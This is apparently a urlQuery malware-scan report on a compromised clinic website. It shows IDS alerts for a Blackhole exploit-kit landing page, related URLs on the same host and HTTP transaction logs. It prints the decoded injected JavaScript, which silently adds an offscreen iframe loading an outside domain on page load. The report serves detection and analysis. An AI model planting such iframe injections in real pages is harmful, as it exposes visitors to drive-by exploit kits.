Overview

URLhttp://lipoinnorthernvirginia.com/serv_content.html
IP97.74.47.1
ASNAS26496 GoDaddy.com, LLC
Location United States
Report completed2012-11-06 14:55:17 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-06 14:54:45 97.74.47.1 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 97.74.47.1

Date Alerts / IDS URL IP
2013-02-23 14:20:560 / 2http://liposuctionindc.com/887.jar97.74.47.1
2013-02-22 21:21:480 / 0http://myhandsonwellness.com/ctuk.htm97.74.47.1
2013-02-18 13:39:481 / 8http://www.urhalpool.com/nabc2009/index.php?lang=ben97.74.47.1
2013-02-12 04:20:571 / 8http://urhalpool.com/nabc2009/index.php?lang=ben97.74.47.1
2013-02-08 18:25:271 / 2http://www.herocombat.com/forum/index.php?topic=30167.new97.74.47.1
2013-01-31 22:25:090 / 0http://texxxan.com97.74.47.1

Last 6 reports on ASN: AS26496 GoDaddy.com, LLC

Date Alerts / IDS URL IP
2013-02-27 15:11:530 / 4http://aquilaplata.com/rox.php50.63.202.64
2013-02-27 15:07:430 / 3http://xlotxdxtorwfmvuzfuvtspel.com/2fQqJ8XXLgeEdj0xLjEmaWQ9Mjg5NDMxNTkzOCZhaWQ9NTEwMTkmc2lkPTQ (...)50.62.12.103
2013-02-27 15:05:370 / 9http://beauregards.net/184.168.243.187
2013-02-27 15:02:060 / 2http://read101.ca/mun.html173.201.185.114
2013-02-27 14:59:470 / 0http://jaffnastmaryscathedral.org/modules/mod_myblog_archive/modules/i/Folder_Baru/202020320938 (...)184.168.192.21
2013-02-27 14:59:300 / 4http://xlotxdxtorwfmvuzfuvtspel.com/iffnT7XXIqmwdj0xLjEmaWQ9MTI3ODQzMDQxMSZhaWQ9NTEwMTkmc2lkPTQ (...)50.62.12.103

Last 4 reports on domain: lipoinnorthernvirginia.com

Date Alerts / IDS URL IP
2012-12-06 04:30:321 / 0http://lipoinnorthernvirginia.com/lipo1.html97.74.47.1
2012-11-07 00:57:401 / 2http://lipoinnorthernvirginia.com/serv_content.html97.74.47.1
2012-11-06 10:36:371 / 1http://lipoinnorthernvirginia.com/contact_content.html97.74.47.1
2012-11-06 04:42:381 / 2http://lipoinnorthernvirginia.com/serv_content2.html97.74.47.1



JavaScript

Executed Scripts (1)


Executed Evals (2)

#1 JavaScript::Eval (size: 286, repeated: 1) - Alert detect on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://moreyfineart.com/xml.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 286) 

j % 3

Executed Writes (0)



HTTP Transactions (11)


Request Response 
GET /serv_content.html HTTP/1.1

Host: lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Tue, 06 Nov 2012 13:54:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5251
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /styles.css HTTP/1.1

Host: lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Tue, 06 Nov 2012 13:54:45 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 13:59:19 GMT
Etag: "14c9c4d-19c-490389e861bc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 217
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/secondary/wht_toplft.gif HTTP/1.1

Host: www.lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:28 GMT
Etag: "1c1ef35-49-47dd3c7a6a000"
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/vita_bkg.gif HTTP/1.1

Host: www.lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 16 Jul 2011 07:43:41 GMT
Etag: "4134754-2c-4a82aecca22df"
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/secondary/section_02.gif HTTP/1.1

Host: www.lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:15 GMT
Etag: "1c52fa-2b6-47dd3c6e042c0"
Accept-Ranges: bytes
Content-Length: 694
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/secondary/pointer.gif HTTP/1.1

Host: www.lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:10 GMT
Etag: "1c52f8-174-47dd3c693f780"
Accept-Ranges: bytes
Content-Length: 372
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/secondary/photo03.jpg HTTP/1.1

Host: www.lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Last-Modified: Sat, 23 Jan 2010 12:07:05 GMT
Etag: "1c52f6-18f7-47dd3c647ac40"
Accept-Ranges: bytes
Content-Length: 6391
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /xml.php HTTP/1.1

Host: moreyfineart.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lipoinnorthernvirginia.com/serv_content.html
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 06 Nov 2012 13:54:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

Host: lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 06 Nov 2012 13:54:49 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 06 Nov 2012 13:54:46 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: lipoinnorthernvirginia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 06 Nov 2012 13:54:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 9837
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive